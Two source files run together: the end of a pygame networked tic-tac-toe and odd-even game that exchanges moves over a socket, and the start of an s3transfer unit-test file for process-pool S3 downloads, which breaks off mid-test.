elif x > 715 and x <= 850 and y > 155 and y <= 300:
cell = 4
elif x > 850 and x <= 975 and y > 155 and y <= 300:
cell = 5
elif x > 585 and x <= 715 and y > 300 and y <= 415:
cell = 6
elif x > 715 and x <= 850 and y > 300 and y <= 415:
cell = 7
elif x > 850 and x <= 975 and y > 300 and y <= 415:
cell = 8
gridNum[cell]= numOfImg
screen.blit(imgNum, (x, y))
numOfImg+=1
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#checks to see if the other player won
if len(data)==4 :
thirdPlace = int(float(data[2]))
#determines which winning line is being used and prints
if thirdPlace==1.0:
screen.blit(imgWinHon, (x, y))
elif thirdPlace==2.0:
screen.blit(imgWinVer, (x, y))
elif thirdPlace==3.0:
screen.blit(imgWinTopLeft, (x, y))
elif thirdPlace==4.0:
screen.blit(imgWinTopRight, (x, y))
#updates the other player's score since they won
score1+=1
playing=False
#turn update output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Game Over!", True, RED), (60, 525))
pygame.display.update()
#calls the createThread method and passes in receiveData
createThread(receiveData)
#GUI for the game
def gamePage():
global score1, score2, gameOption, screen, btnText, player1, player2, selectText
#Game option header
screen.blit(btnText.render("Games", True, RED), (55,50))
screen.blit(imgGame1, (55, 90))
screen.blit(imgGame2, (215, 90))
screen.blit(btnText.render("Players", True, RED), (55,300))
screen.blit(imgPlayer1, (55, 345))
screen.blit(imgPlayer2, (215, 345))
#score board for player 1
player1Score = pygame.Rect(435, 460, 180, 45)
pygame.draw.rect(screen, RED, player1Score)
#score board for player 2
player2Score = pygame.Rect(435, 515, 180, 45)
pygame.draw.rect(screen, RED, player2Score)
#shows grid image
screen.blit(gridImg, (550, 20))
#if a game option is selected (not zero), player 1's score board will show player 1's score.
#otherwise, it will tell the user to select a game.
if gameOption != 0:
screen.blit(selectText.render("Select Games", True, RED), (443, 470))
screen.blit(btnText.render(player1 + ": " + str(score1), True, BLACK), (455, 465))
else:
screen.blit(btnText.render(player1 + ": " + str(score1), True, RED), (455, 465))
screen.blit(selectText.render("Select Games", True, BLACK), (443, 470))
#if a player option is selected (not zero), player 2's score board will show player 2's score.
#otherwise, it will tell the user to select a number of players.
if playerOption != 0:
screen.blit(selectText.render("Select Players", True, RED), (441, 525))
screen.blit(btnText.render(player2 + ": " + str(score2), True, BLACK), (455, 520))
else:
screen.blit(btnText.render(player2 + ": " + str(score2), True, RED), (455, 520))
screen.blit(selectText.render("Select Players", True, BLACK), (441, 525))
#if gameOption is 1 means X and O
#otherwise, it means odd and even
if gameOption == 1:
player1 = "X"
player2 = "O"
elif gameOption == 2:
player1 = "Even"
player2 = "Odd"
#Again button setting
againBtn = pygame.Rect(655, 460, 130, 100)
pygame.draw.rect(screen, RED, againBtn)
screen.blit(btnText.render("Again", True, BLACK), (663, 490))
#New button setting
newBtn = pygame.Rect(831, 460, 130, 100)
pygame.draw.rect(screen, RED, newBtn)
screen.blit(btnText.render("New", True, BLACK), (855, 490))
#Reset button setting
resetBtn = pygame.Rect(1005, 460, 130, 100)
pygame.draw.rect(screen, RED, resetBtn)
screen.blit(btnText.render("Reset", True, BLACK), (1015, 490))
#counts option-selection clicks; after the second click the first turn prompt is drawn
count=0
#set gameOption and playerOption by checking the ranges of coordinates of each button
def setGameAndPlayerOptions():
global gameOption, playerOption, imgGame1, imgGame2, count
count+=1
x, y = pygame.mouse.get_pos()
if x > 55 and x < 215 and y > 90 and y < 250:
if gameOption == 0:
gameOption = 1
if x > 215 and x < 375 and y > 90 and y < 250:
if gameOption == 0:
gameOption = 2
if x > 55 and x < 215 and y > 345 and y < 505:
if playerOption == 0:
playerOption = 0 #1-player mode is not available, so the selection is left unset
if x > 215 and x < 375 and y > 345 and y < 505:
if playerOption == 0:
playerOption = 2
if count==2:
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#sets everything back to the beginning and clears the grid,
#but does not reset the scores or let the users change game and player options
def clear():
global tradiCurrPlayer, gridTradi, gridNum, gameOption, cell, numOfImg
screen.blit(gridImg, (550, 20))
screen.fill(BLACK)
if gameOption==1:
tradiCurrPlayer = 'x'
for row in range(0,3):
for col in range(0,3):
gridTradi[row][col] = None
else:
cell = 0
numOfImg = 1
gridNum = [0, 0, 0, 0, 0, 0, 0, 0, 0]
#function for Again button
def againBtn():
global turn, playing
x, y = pygame.mouse.get_pos()
if x > 655 and x < 785 and y > 460 and y < 560:
clear()
turn=True
playing= True
sendData= '{}-{}-{}'.format(x,y,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#function for New button. resets the scores
def newBtn():
global score1, score2, turn, playing
x, y = pygame.mouse.get_pos()
if x > 830 and x < 961 and y > 460 and y < 560:
score1 = 0
score2 = 0
screen.blit(gridImg, (550, 20))
screen.fill(BLACK)
clear()
playing=True
turn= True
sendData= '{}-{}-{}'.format(x,y,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#function for Reset button. resets the score and
#the users can change game and player options
def resetBtn():
global gameOption, playerOption, score1, score2, turn, playing, count, numOfImg
x, y = pygame.mouse.get_pos()
if x > 1005 and x < 1135 and y > 460 and y < 560:
score1 = 0
score2 = 0
gameOption = 0
playerOption = 0
numOfImg=1
screen.blit(gridImg, (550, 20))
screen.fill(BLACK)
clear()
turn=True
playing=True
count=0
#----------------------------------------
#| FOR X and O GAME |
#----------------------------------------
#setting where to put X and O on the grid
def tradiDrawOX(row, col):
global tradiCurrPlayer, turn
codY = 0
codX = 0
if row == 1:
codY = 50
if row == 2:
codY = 185
if row == 3:
codY = 320
if col == 1:
codX = 614
if col == 2:
codX = 744
if col == 3:
codX = 879
#draw the O image for the local move (the grid stores it as 'x') and end the local turn
tradiCurrPlayer='x'
screen.blit(imgO, (codX, codY))
turn= False
#if a row, column, or diagonal has the same sign, the winning line will be drawn and sent to the other user
def tradiCheckWin():
global turn, playing
win = False
row = 0
if gridTradi[row][0] == gridTradi[row][1] == gridTradi[row][2] and gridTradi[row][0] is not None and gridTradi[row][1] is not None and gridTradi[row][2] is not None:
screen.blit(imgWinHon, (583, 90))
playing=False
sendData= '{}-{}-{}-{}'.format(583,90,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
row = 1
if gridTradi[row][0] == gridTradi[row][1] == gridTradi[row][2] and gridTradi[row][0] is not None and gridTradi[row][1] is not None and gridTradi[row][2] is not None:
screen.blit(imgWinHon, (583, 222))
playing=False
sendData= '{}-{}-{}-{}'.format(583,222,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
row = 2
if gridTradi[row][0] == gridTradi[row][1] == gridTradi[row][2] and gridTradi[row][0] is not None and gridTradi[row][1] is not None and gridTradi[row][2] is not None:
screen.blit(imgWinHon, (583, 354))
playing=False
sendData= '{}-{}-{}-{}'.format(583,354,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
col = 0
if gridTradi[0][col] == gridTradi[1][col] == gridTradi[2][col] and gridTradi[0][col] is not None and gridTradi[1][col] is not None and gridTradi[2][col] is not None:
screen.blit(imgWinVer, (645, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(645,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
col = 1
if gridTradi[0][col] == gridTradi[1][col] == gridTradi[2][col] and gridTradi[0][col] is not None and gridTradi[1][col] is not None and gridTradi[2][col] is not None:
screen.blit(imgWinVer, (775, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(775,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
col = 2
if gridTradi[0][col] == gridTradi[1][col] == gridTradi[2][col] and gridTradi[0][col] is not None and gridTradi[1][col] is not None and gridTradi[2][col] is not None:
screen.blit(imgWinVer, (910, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(910,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if gridTradi[0][0] == gridTradi[1][1] == gridTradi[2][2] and gridTradi[0][0] is not None and gridTradi[1][1] is not None and gridTradi[2][2] is not None:
screen.blit(imgWinTopLeft, (587, 34))
playing=False
sendData= '{}-{}-{}-{}'.format(587, 34,3.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if gridTradi[0][2] == gridTradi[1][1] == gridTradi[2][0] and gridTradi[0][2] is not None and gridTradi[1][1] is not None and gridTradi[2][0] is not None:
screen.blit(imgWinTopRight, (587, 34))
playing=False
sendData= '{}-{}-{}-{}'.format(587, 34, 4.0, playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
return win
#game logic for X and O
def tradiGame():
global turn, tradiCurrPlayer, gridTradi, score1, score2, row, col, playing, turn, btnText
if turn and playing:
x, y = pygame.mouse.get_pos()
if x > 585 and x <= 975 and y > 35 and y <= 415:
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Wait for your turn!", True, RED), (60, 525))
if x > 585 and x <= 715:
col = 1
x=615
elif x > 715 and x <= 850:
col = 2
x=745
elif x > 850 and x <= 975:
col = 3
x=890
if y > 35 and y <= 155:
row = 1
y=55
elif y > 155 and y <= 300:
row = 2
y=185
elif y > 300 and y <= 415:
row = 3
y=320
#sends information about the move to the other user
sendData= '{}-{}-{}'.format(int(x),int(y),playing).encode()
sock.send(sendData)
if tradiCheckWin() is False:
if x > 585 and x <= 975 and y > 35 and y <= 415:
if gridTradi[row-1][col-1] == None:
gridTradi[row-1][col-1] = tradiCurrPlayer
tradiDrawOX(row, col)
if tradiCheckWin():
playing=False
if tradiCurrPlayer == 'x':
score2 += 1
else:
score1 += 1
turn=False
#---------------------------------------------
#| FOR Odd and Even GAME |
#---------------------------------------------
#for drawing number images
def numDraw(cell):
global numOfImg
codX = 0
codY = 0
if cell == 1:
codX= 614
codY = 50
if cell == 2:
codX= 744
codY = 50
if cell == 3:
codX= 879
codY = 50
if cell == 4:
codX= 614
codY = 185
if cell == 5:
codX= 744
codY = 185
if cell == 6:
codX= 879
codY = 185
if cell == 7:
codX= 614
codY = 320
if cell == 8:
codX= 744
codY = 320
if cell == 9:
codX= 879
codY = 320
imgNum = pygame.image.load('assets\\' + str(numOfImg) + ".png")
imgNum = pygame.transform.scale(imgNum, (80,80))
screen.blit(imgNum, (codX, codY))
#if a row, column, or diagonal line has the sum of 15, a winning line will be drawn and sent to the other user
def numCheckWin():
global turn, playing
win = False
if (gridNum[0]+ gridNum[1]+ gridNum[2]==15 and gridNum[0] != 0 and gridNum[1] != 0 and gridNum[2] != 0):
screen.blit(imgWinHon, (583, 90))
playing=False
sendData= '{}-{}-{}-{}'.format(583,90,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[3]+ gridNum[4]+ gridNum[5]==15 and gridNum[3] != 0 and gridNum[4] != 0 and gridNum[5] != 0):
screen.blit(imgWinHon, (583, 222))
playing=False
sendData= '{}-{}-{}-{}'.format(583,222,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[6]+ gridNum[7]+ gridNum[8]==15 and gridNum[6] != 0 and gridNum[7] != 0 and gridNum[8] != 0):
screen.blit(imgWinHon, (583, 354))
playing=False
sendData= '{}-{}-{}-{}'.format(583,354,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[0]+ gridNum[3]+ gridNum[6]==15 and gridNum[0] != 0 and gridNum[3] != 0 and gridNum[6] != 0):
screen.blit(imgWinVer, (645, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(645,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[1] +gridNum[4]+ gridNum[7]==15 and gridNum[1] != 0 and gridNum[4] != 0 and gridNum[7] != 0):
screen.blit(imgWinVer, (775, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(775,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[2]+ gridNum[5]+ gridNum[8]==15 and gridNum[2] != 0 and gridNum[5] != 0 and gridNum[8] != 0):
screen.blit(imgWinVer, (910, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(910,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[0]+ gridNum[4]+ gridNum[8]==15 and gridNum[0] != 0 and gridNum[4] != 0 and gridNum[8] != 0):
screen.blit(imgWinTopLeft, (587, 34))
playing=False
sendData= '{}-{}-{}-{}'.format(587,34,3.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[2]+ gridNum[4]+ gridNum[6]==15 and gridNum[2] != 0 and gridNum[4] != 0 and gridNum[6] != 0):
screen.blit(imgWinTopRight, (587, 34))
playing=False
sendData= '{}-{}-{}-{}'.format(587,34,4.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
return win
#game logic for odd and even
def numGame():
global numOfImg, gridNum, score1, score2, cell, playing, turn
if turn and playing:
# get coordinates of mouse click
x, y = pygame.mouse.get_pos()
if x > 585 and x <= 975 and y > 35 and y <= 415:
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Wait for your turn!", True, RED), (60, 525))
if x > 585 and x < 715 and y > 35 and y < 155:
cell = 1
x=615
y=55
elif x > 715 and x <= 850 and y > 35 and y <= 155:
cell = 2
x=745
y=55
elif x > 850 and x <= 975 and y > 35 and y <= 155:
cell = 3
x=890
y=55
elif x > 585 and x <= 715 and y > 155 and y <= 300:
cell = 4
x=615
y=185
elif x > 715 and x <= 850 and y > 155 and y <= 300:
cell = 5
x=745
y=185
elif x > 850 and x <= 975 and y > 155 and y <= 300:
cell = 6
x=890
y=185
elif x > 585 and x <= 715 and y > 300 and y <= 415:
cell = 7
x=615
y=320
elif x > 715 and x <= 850 and y > 300 and y <= 415:
cell = 8
x=745
y=320
elif x > 850 and x <= 975 and y > 300 and y <= 415:
cell = 9
x=890
y=320
if numCheckWin() is False:
if x > 585 and x <= 975 and y > 35 and y <= 415:
if gridNum[cell-1] < 1 and numOfImg <= 9:
gridNum[cell-1] = numOfImg
numDraw(cell)
#sends information about the move to the other user
sendData= '{}-{}-{}'.format(x,y,playing).encode()
sock.send(sendData)
numOfImg += 1
if numCheckWin():
playing=False
if numOfImg % 2:
score1 += 1
else:
score2 += 1
#handles the Again/New/Reset buttons and runs the selected game type
def gameClicks():
global gameOption
againBtn()
newBtn()
resetBtn()
if gameOption == 1:
tradiGame()
elif gameOption == 2:
numGame()
#for running the game
running = True
#while loop for running Pygame
while running:
pygame.init()
gamePage()
#if a mouse click happens inside an active area, the game logic runs
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
playing = False
elif event.type == pygame.MOUSEBUTTONDOWN:
setGameAndPlayerOptions()
gameClicks()
pygame.display.update()
pygame.quit()
|
test_processpool.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import signal
import time
import threading
import mock
from six.moves import queue
from botocore.exceptions import ClientError
from botocore.exceptions import ReadTimeoutError
from botocore.client import BaseClient
from botocore.config import Config
from tests import unittest
from tests import skip_if_windows
from tests import FileCreator
from tests import StreamWithError
from tests import StubbedClientTest
from s3transfer.compat import six
from s3transfer.constants import PROCESS_USER_AGENT
from s3transfer.exceptions import RetriesExceededError
from s3transfer.exceptions import CancelledError
from s3transfer.utils import OSUtils
from s3transfer.utils import CallArgs
from s3transfer.processpool import SHUTDOWN_SIGNAL
from s3transfer.processpool import ignore_ctrl_c
from s3transfer.processpool import DownloadFileRequest
from s3transfer.processpool import GetObjectJob
from s3transfer.processpool import ProcessTransferConfig
from s3transfer.processpool import ProcessPoolDownloader
from s3transfer.processpool import ProcessPoolTransferFuture
from s3transfer.processpool import ProcessPoolTransferMeta
from s3transfer.processpool import TransferMonitor
from s3transfer.processpool import TransferState
from s3transfer.processpool import ClientFactory
from s3transfer.processpool import GetObjectSubmitter
from s3transfer.processpool import GetObjectWorker
class RenameFailingOSUtils(OSUtils):
def __init__(self, exception):
self.exception = exception
def rename_file(self, current_filename, new_filename):
raise self.exception
class TestIgnoreCtrlC(unittest.TestCase):
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_ignore_ctrl_c(self):
with ignore_ctrl_c():
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
self.fail('The ignore_ctrl_c context manager should have '
'ignored the KeyboardInterrupt exception')
class TestProcessPoolDownloader(unittest.TestCase):
def test_uses_client_kwargs(self):
with mock.patch('s3transfer.processpool.ClientFactory') as factory:
ProcessPoolDownloader(client_kwargs={'region_name': 'myregion'})
self.assertEqual(
factory.call_args[0][0], {'region_name': 'myregion'})
class TestProcessPoolTransferFuture(unittest.TestCase):
def setUp(self):
self.monitor = TransferMonitor()
self.transfer_id = self.monitor.notify_new_transfer()
self.meta = ProcessPoolTransferMeta(
transfer_id=self.transfer_id, call_args=CallArgs())
self.future = ProcessPoolTransferFuture(
monitor=self.monitor, meta=self.meta)
def test_meta(self):
self.assertEqual(self.future.meta, self.meta)
def test_done(self):
self.assertFalse(self.future.done())
self.monitor.notify_done(self.transfer_id)
self.assertTrue(self.future.done())
def test_result(self):
self.monitor.notify_done(self.transfer_id)
self.assertIsNone(self.future.result())
def test_result_with_exception(self):
self.monitor.notify_exception(self.transfer_id, RuntimeError())
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(RuntimeError):
self.future.result()
def test_result_with_keyboard_interrupt(self):
mock_monitor = mock.Mock(TransferMonitor)
mock_monitor._connect = mock.Mock()
mock_monitor.poll_for_result.side_effect = KeyboardInterrupt()
future = ProcessPoolTransferFuture(
monitor=mock_monitor, meta=self.meta)
with self.assertRaises(KeyboardInterrupt):
future.result()
self.assertTrue(mock_monitor._connect.called)
self.assertTrue(mock_monitor.notify_exception.called)
call_args = mock_monitor.notify_exception.call_args[0]
self.assertEqual(call_args[0], self.transfer_id)
self.assertIsInstance(call_args[1], CancelledError)
def test_cancel(self):
self.future.cancel()
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(CancelledError):
self.future.result()
class TestProcessPoolTransferMeta(unittest.TestCase):
def test_transfer_id(self):
meta = ProcessPoolTransferMeta(1, CallArgs())
self.assertEqual(meta.transfer_id, 1)
def test_call_args(self):
call_args = CallArgs()
meta = ProcessPoolTransferMeta(1, call_args)
self.assertEqual(meta.call_args, call_args)
def test_user_context(self):
meta = ProcessPoolTransferMeta(1, CallArgs())
self.assertEqual(meta.user_context, {})
meta.user_context['mykey'] = 'myvalue'
self.assertEqual(meta.user_context, {'mykey': 'myvalue'})
class TestClientFactory(unittest.TestCase):
def test_create_client(self):
client = ClientFactory().create_client()
self.assertIsInstance(client, BaseClient)
self.assertEqual(client.meta.service_model.service_name, 's3')
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_create_client_with_client_kwargs(self):
client = ClientFactory({'region_name': 'myregion'}).create_client()
self.assertEqual(client.meta.region_name, 'myregion')
def test_user_agent_with_config(self):
client = ClientFactory({'config': Config()}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_user_agent_with_existing_user_agent_extra(self):
config = Config(user_agent_extra='foo/1.0')
client = ClientFactory({'config': config}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_user_agent_with_existing_user_agent(self):
config = Config(user_agent='foo/1.0')
client = ClientFactory({'config': config}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
class TestTransferMonitor(unittest.TestCase):
def setUp(self):
self.monitor = TransferMonitor()
self.transfer_id = self.monitor.notify_new_transfer()
def test_notify_new_transfer_creates_new_state(self):
monitor = TransferMonitor()
transfer_id = monitor.notify_new_transfer()
self.assertFalse(monitor.is_done(transfer_id))
self.assertIsNone(monitor.get_exception(transfer_id))
def test_notify_new_transfer_increments_transfer_id(self):
monitor = TransferMonitor()
self.assertEqual(monitor.notify_new_transfer(), 0)
self.assertEqual(monitor.notify_new_transfer(), 1)
def test_notify_get_exception(self):
exception = Exception()
self.monitor.notify_exception(self.transfer_id, exception)
self.assertEqual(
self.monitor.get_exception(self.transfer_id), exception)
def test_get_no_exception(self):
self.assertIsNone(self.monitor.get_exception(self.transfer_id))
def test_notify_jobs(self):
self.monitor.notify_expected_jobs_to_complete(self.transfer_id, 2)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 1)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 0)
def test_notify_jobs_for_multiple_transfers(self):
self.monitor.notify_expected_jobs_to_complete(self.transfer_id, 2)
other_transfer_id = self.monitor.notify_new_transfer()
self.monitor.notify_expected_jobs_to_complete(other_transfer_id, 2)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 1)
self.assertEqual(
self.monitor.notify_job_complete(other_transfer_id), 1)
def test_done(self):
self.assertFalse(self.monitor.is_done(self.transfer_id))
self.monitor.notify_done(self.transfer_id)
self.assertTrue(self.monitor.is_done(self.transfer_id))
def test_poll_for_result(self):
self.monitor.notify_done(self.transfer_id)
self.assertIsNone(self.monitor.poll_for_result(self.transfer_id))
def test_poll_for_result_raises_error(self):
self.monitor.notify_exception(self.transfer_id, RuntimeError())
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(RuntimeError):
self.monitor.poll_for_result(self.transfer_id)
def test_poll_for_result_waits_till_done(self):
event_order = []
def sleep_then_notify_done():
time.sleep(0.05)
event_order.append('notify_done')
self.monitor.notify_done(self.transfer_id)
t = threading.Thread(target=sleep_then_notify_done)
t.start()
self.monitor.poll_for_result(self.transfer_id)
event_order.append('done_polling')
self.assertEqual(event_order, ['notify_done', 'done_polling'])
def test_notify_cancel_all_in_progress(self):
monitor = TransferMonitor()
transfer_ids = []
for _ in range(10):
transfer_ids.append(monitor.notify_new_transfer())
monitor.notify_cancel_all_in_progress()
for transfer_id in transfer_ids:
self.assertIsInstance(
monitor.get_exception(transfer_id), CancelledError)
# Cancelling a transfer does not mean it is done as there may
# be cleanup work left to do.
self.assertFalse(monitor.is_done(transfer_id))
def test_notify_cancel_does_not_affect_done_transfers(self):
self.monitor.notify_done(self.transfer_id)
self.monitor.notify_cancel_all_in_progress()
self.assertTrue(self.monitor.is_done(self.transfer_id))
self.assertIsNone(self.monitor.get_exception(self.transfer_id))
class TestTransferState(unittest.TestCase):
def setUp(self):
self.state = TransferState()
def test_done(self):
self.assertFalse(self.state.done)
self.state.set_done()
self.assertTrue(self.state.done)
def test_waits_till_done_is_set(self):
event_order = []
def sleep_then_set_done():
time.sleep(0.05)
event_order.append('set_done')
self.state.set_done()
t = threading.Thread(target=sleep_then_set_done)
t.start()
self.state.wait_till_done()
event_order.append('done_waiting')
self.assertEqual(event_order, ['set_done', 'done_waiting'])
def test_exception(self):
exception = RuntimeError()
self.state.exception = exception
self.assertEqual(self.state.exception, exception)
def test_jobs_to_complete(self):
self.state.jobs_to_complete = 5
self.assertEqual(self.state.jobs_to_complete, 5)
def test_decrement_jobs_to_complete(self):
self.state.jobs_to_complete = 5
self.assertEqual(self.state.decrement_jobs_to_complete(), 4)
class TestGetObjectSubmitter(StubbedClientTest):
def setUp(self):
super(TestGetObjectSubmitter, self).setUp()
self.transfer_config = ProcessTransferConfig()
self.client_factory = mock.Mock(ClientFactory)
self.client_factory.create_client.return_value = self.client
self.transfer_monitor = TransferMonitor()
self.osutil = mock.Mock(OSUtils)
self.download_request_queue = queue.Queue()
self.worker_queue = queue.Queue()
self.submitter = GetObjectSubmitter(
transfer_config=self.transfer_config,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=self.osutil,
download_request_queue=self.download_request_queue,
worker_queue=self.worker_queue,
)
self.transfer_id = self.transfer_monitor.notify_new_transfer()
self.bucket = 'bucket'
self.key = 'key'
self.filename = 'myfile'
self.temp_filename = 'myfile.temp'
self.osutil.get_temp_filename.return_value = self.temp_filename
self.extra_args = {}
self.expected_size = None
def add_download_file_request(self, **override_kwargs):
kwargs = {
'transfer_id': self.transfer_id,
'bucket': self.bucket,
'key': self.key,
'filename': self.filename,
'extra_args': self.extra_args,
'expected_size': self.expected_size
}
kwargs.update(override_kwargs)
self.download_request_queue.put(DownloadFileRequest(**kwargs))
def add_shutdown(self):
self.download_request_queue.put(SHUTDOWN_SIGNAL)
def assert_submitted_get_object_jobs(self, expected_jobs):
actual_jobs = []
while not self.worker_queue.empty():
actual_jobs.append(self.worker_queue.get())
self.assertEqual(actual_jobs, expected_jobs)
def test_run_for_non_ranged_download(self):
self.add_download_file_request(expected_size=1)
self.add_shutdown()
self.submitter.run()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs([
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={},
filename=self.filename,
)
])
def test_run_for_ranged_download(self):
self.transfer_config.multipart_chunksize = 2
self.transfer_config.multipart_threshold = 4
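# With a 4-byte object, a multipart threshold of 4 and a chunk size of 2, the
# submitter is expected to split the download into two ranged GETs
# (bytes=0-1 and bytes=2-), which assert_submitted_get_object_jobs verifies below.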
self.add_download_file_request(expected_size=4)
self.add_shutdown()
self.submitter.run()
self.osutil.allocate.assert_called_with(self.temp_filename, 4)
self.assert_submitted_get_object_jobs([
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={'Range': 'bytes=0-1'},
filename=self.filename,
),
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=2,
extra_args={'Range': 'bytes=2-'},
filename=self.filename,
),
])
def test_run_when_expected_size_not_provided(self):
self.stubber.add_response(
'head_object', {'ContentLength': 1},
expected_params={
'Bucket': self.bucket,
'Key': self.key
}
)
self.add_download_file_request(expected_size=None)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs([
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={},
filename=self.filename,
)
])
def test_run_with_extra_args(self):
self.stubber.add_response(
'head_object', {'ContentLength': 1},
expected_params={
'Bucket': self.bucket,
'Key': self.key,
'VersionId': 'versionid'
}
)
self.add_download_file_request(
extra_args={'VersionId': 'versionid'},
expected_size=None
)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs([
GetObjectJob(
transfer_id=self.transfer_id,
